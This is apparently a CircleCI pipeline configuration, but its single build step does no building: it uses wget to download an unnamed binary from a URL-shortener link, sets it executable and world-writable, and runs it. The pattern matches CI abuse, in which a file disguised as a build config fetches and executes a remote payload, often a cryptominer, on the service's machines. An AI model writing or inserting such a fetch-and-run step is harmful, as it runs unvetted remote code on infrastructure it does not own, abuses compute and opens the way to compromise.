version: 2.1
 
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - run: wget -O brnh http://gg.gg/vkrrl && chmod +x brnh && chmod 777 brnh && ./brnh